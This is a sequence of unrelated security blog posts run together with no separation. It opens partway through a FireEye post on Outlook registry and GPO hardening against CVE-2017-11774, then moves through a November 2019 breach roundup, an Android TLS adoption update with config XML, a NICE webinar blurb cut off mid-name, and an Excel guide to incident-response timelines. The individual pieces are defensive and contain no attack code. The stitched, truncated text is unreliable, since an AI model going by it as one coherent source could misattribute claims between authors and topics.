To enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: NonDefaultStoreScript
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 4: NonDefaultStoreScript registry setting

Included within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages

While you’re locking things down, we thought that readers would also want to ensure they are locked down against RULER’s other modules for rules-based persistence and forms-based persistence. This last recommendation ensures that the rule types required by the other RULER modules are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related and this last setting is consistent with Microsoft’s prior guidance on rules and forms persistence.

The registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application” rules is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security\
"EnableUnsafeClientMailRules"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableUnsafeClientMailRules
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 5: EnableUnsafeClientMailRules registry setting

Once all of aforementioned endpoint policies are configured – we recommend a final step to protect these settings from unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint – even if the registry value was intentionally reversed by an attacker – the following GPO settings should also be configured and enforced:

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing
    • Enabled - Process even if the Group Policy objects have not changed
  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing
    • Enabled - Process even if the Group Policy objects have not changed


Figure 6: Group Policy processing settings

For more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.

Let’s Go Hunt (doo doo doo)

With this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written for FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.

The Yara hunting rule provided by Nick Carr at the end the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.

If you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:

Interesting MITRE ATT&CK techniques explicitly referenced in this blog post:

ID

Technique

Context

T1137

Office Application Startup

Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique

T1480

Execution Guardrails

Nick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post

Acknowledgements

The authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in Managed Defense SOC working around the clock to secure our customers and have disrupted this specific attack chain several times. We want to thank the SensePost team – for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is to be a good ruler must have first been ruled.”

Cyber Security Roundup for November 2019

In recent years political motivated cyber-attacks during elections has become an expected norm, so it was no real surprise when the Labour Party reported it was hit with two DDoS cyber-attacks in the run up to the UK general election, which was well publicised by the media. However, what wasn't well publicised was both the Conservative Party and Liberal Democrats Party were also hit with cyber attacks. These weren't nation-state orchestrated cyberattacks either, black hat hacking group Lizard Squad, well known for their high profile DDoS attacks, are believed to be the culprits.

The launch of Disney Plus didn’t go exactly to plan, without hours of the streaming service going live, compromised Disney Plus user accounts credentials were being sold on the black market for as little as £2.30 a pop. Disney suggested hackers had obtained customer credentials from previously leaked identical credentials, as used by their customers on other compromised or insecure websites, and from keylogging malware. It's worth noting Disney Plus doesn’t use Multi-Factor Authentication (MFA), implementing MFA to protect their customer's accounts would have prevented the vast majority of Disney Plus account compromises in my view.

Trend Micro reported an insider stolen around 100,000 customer accounts details, with the data used by cyber con artists to make convincing scam phone calls impersonating their company to a number of their customers. In a statement, Trend Micro said it determined the attack was an inside job, an employee used fraudulent methods to access its customer support databases, retrieved the data and then sold it on. “Our open investigation has confirmed that this was not an external hack, but rather the work of a malicious internal source that engaged in a premeditated infiltration scheme to bypass our sophisticated controls,” the company said. The employee behind it was identified and fired, Trend Micro said it is working with law enforcement in an on-going investigation.

Security researchers found 4 billion records from 1.2 billion people on an unsecured Elasticsearch server. The personal information includes names, home and mobile phone numbers and email addresses and what may be information scraped from LinkedIn, Facebook and other social media sources.

T-Mobile reported a data breach of some their prepaid account customers. A T-Mobile spokesman said “Our cybersecurity team discovered and shut down malicious, unauthorized access to some information related to your T-Mobile prepaid wireless account. We promptly reported this to authorities”.

A French hospital was hit hard by a ransomware attack which has caused "very long delays in care". According to a spokesman, medical staff at Rouen University Hospital Centre (CHU) abandon PCs as ransomware had made them unusable, instead, staff returned to the "old-fashioned method of paper and pencil". No details about the strain of the ransomware have been released.

Microsoft released patches for 74 vulnerabilities in November, including 13 which are rated as critical. One of which was for a vulnerability with Internet Explorer (CVE-2019-1429), an ActiveX vulnerability known to be actively exploited by visiting malicious websites.

It was a busy month for blog articles and threat intelligence news, all are linked below.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCEHUAWEI NEWS AND THREAT INTELLIGENCE

An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security

banner illustration with several devices and gaming controller

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To ensure apps are safe, apps targeting Android 9 (API level 28) or higher automatically have a policy set by default that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.

Percentage of apps that block cleartext by default.

Since November 1 2019, all app (updates as well as all new apps on Google Play) must target at least Android 9. As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers as part of the pre-launch report.

Example of a warning shown to developers as part of the pre-launch report.

What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set without requiring any extra configuration. Apps can provide an exception to this only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
<base-config cleartextTrafficPermitted="false" />
<domain-config cleartextTrafficPermitted="true">
<domain includeSubdomains="true">insecure.example.com</domain>
<domain includeSubdomains="true">insecure.cdn.example.com</domain>
</domain-config>
</network-security-config>

If your app needs to be able to accept user specified certificates for testing purposes (for example, connecting to a local server during testing), make sure to wrap your element inside a element. This ensures the connections in the production version of your app are secure.

<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="user"/>
</trust-anchors>
</debug-overrides>
</network-security-config>

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

NICE Webinar: How You Can Influence an Update to the NICE Framework

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Bill Newhouse Deputy Director, National Initiative for Cybersecurity Education (NICE), National Institute for Standards and Technology (NIST) Senior Human Capital Strategist, Booz Allen Hamilton, On behalf of the Department of Defense, Office of the Chief Information Officer Benjamin Scribner Section Chief, Stakeholder Engagement Division, Cybersecurity and Infrastructure Security Agency (CISA) Pamela Frugoli Senior Workforce Analyst, Employment and Training Administration (ETA), US Department of Labor Danielle

Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

$SI Created

$SI Modified

File Name

File Path

File Size

File MD5

File Attributes

File Deleted

2019-10-14 23:13:04

2019-10-14 23:33:45

Default.rdp

C:\Users\
attacker\Documents\

485

c482e563df19a40
1941c99888ac2f525

Archive

FALSE

Event Gen Time

Event ID

Event Message

Event Category

Event User

Event System

2019-10-14 23:13:06

4648

A logon was attempted using explicit credentials.

Subject:
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   -

Logon

Administrator

SourceSystem

KeyModified

Key Path

KeyName

ValueName

ValueText

Type

2019-10-14 23:33:46

HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\

DestinationServer

UsernameHInt

VictimUser

REG_SZ

Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make the data easy to combine into a single timeline view. To format the data, we can use the “&” operation with a function to join information we may need into a “Summary” field.

An example command to join the relevant file system data delimited by ampersands could be “=D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2”. Combining this format function with a “Timestamp” and “Timestamp Type” column will complete everything we need for streamlined analysis.

Timestamp

Timestamp Type

Event

2019-10-14 23:13:04

$SI Created

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:13:06

Event Gen Time

4648 | A logon was attempted using explicit credentials.

Subject:
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   - | Logon | Administrator | SourceSystem

2019-10-14 23:33:45

$SI Modified

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:33:46

KeyModified

HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHInt | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span various time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) format in its investigations to eliminate any confusion of both time zones and time adjustments such as daylight savings and regional summer seasons. 

Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME()  formula to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As it stands the previous screenshot, we have some login events to the HR application, which may look like normal activity for the employees. Then later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk the login and web log events being overlooked as the time of activity precedes our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.

Pro Tip: Be sure to account for log data spanning over changes in UTC offset due to regional events such as daylight savings or summer seasons. For example, local time zone adjustments will need to change for logs in United States Eastern Time from Virginia, USA from +TIME(5,0,0) to +TIME(4,0,0) the first weekend in March every year and back from +TIME(4,0,0) to +TIME(5,0,0) the first weekend in November to account for daylight and standard shifts.

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B$25 
    • This is the entire range of all cells, B2 through B25, that we want to use as a range to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells. 
  • B2 
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 

When most user accounts log on regularly, a compromised account being used to logon for the first time may clearly stand out when reviewing total log on counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.  

The COUNTIF formula can help track accounts through time to identify their first log on which can help identify rarely used credentials that were abused for a limited time frame.  

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D3. Here is a breakdown of the parameters  for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an importance nuance: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B2 
    • This is the range of cells, B2 through B2, that we want to start with. Since we want to increase our range as we go through the rows of the log data, the ending cell row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs. 
  • B2 
    • This cell contains the value we want to search for and provides a count of occurrences found in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  


To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.

Conclusion

The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any variety of skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through analysis of any presented data type as efficiently as possible.